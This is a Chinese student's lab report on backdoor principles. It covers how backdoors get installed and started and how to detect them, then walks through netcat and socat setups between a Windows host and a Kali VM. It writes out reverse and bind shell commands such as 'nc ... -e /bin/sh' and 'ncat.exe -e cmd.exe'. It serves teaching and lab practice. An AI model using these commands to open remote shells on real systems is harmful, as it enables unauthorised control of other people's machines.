20145229吴姗珊后门原理与实现

实践

基础问题回答

例举你能想到的一个后门进入到你系统中的可能方式？
拿自己的U盘去打印店打印东西后又把U盘插到自己电脑里
下载软件的时候捆绑下载了后门
上网的时候无意点击了一些广告之类的
例举你知道的后门如何启动起来(win及linux)的方式？
把后门程序伪装起来，比如将其重命名为QQ或者游戏名称，让我们点击然后启动
跟其他启动项捆绑在一起，启动其他软件的时候自动启动后门
Meterpreter有哪些给你映像深刻的功能？
最深刻的是可以通过指令打开主机的摄像头，那岂不是毫无隐私可言

-如何发现自己有系统有没有被安装后门？
最简单的就是通过一些杀毒软件定期进行查杀
对防火墙进行检查，我们做得ncat就需要让防火墙允许其运行，所以最有效的方法就是查看防火墙允许通过的程序

实践

1.netcat

首先通过ipconfig以及ifconfig对win以及虚拟机进行ip查询

windows ip:192.168.2.147 虚拟机ip：192.168.195.255
问题：在最开始我在虚拟机中输入ifconfig，并没有出现虚拟机的ip，出现下图所示

通过百度发现是虚拟机的网卡出现了问题，通过对主机网卡网络适配器进行重新配置后成功

win获取linux的shell
在windows系统中打开命令行，cd进入ncat.exe所在的文件夹目录下，输入指令ncat.exe -l -p 5229，开启netcat监听

在kali中，输入指令nc win的IP 5229 -e /bin/sh
等待win获得kali的shell后，可以进行测试，输入ls查看虚拟机的目录

Kali获取Win的shell
Kali开启netcat监听，输入命令nc -l -p 5229
win：ncat.exe -e cmd.exe 192.168.195.255 5229

出现了问题，百度过然后重复了步骤，找不出错误，明天找老师看看把
做了很多措施后发现是虚拟机的问题，所以借了同学的虚拟机进行操作，新的win IP为：192.168.2.175 虚拟机IP为：192.168.234.140

2.使用socat获取主机操作Shell
（1）Kali获取Wi的shell
Windows中开启监听程序，socat tcp-listen:5229 exec:cmd,pty,stderr
Kali连接Win中开启的监听程序，获取shell，socat - tcp：win的ip：5229
就可以当做是在windows的cmd中，输入ipconfig进行测试
（2）Win获取Kali的shell。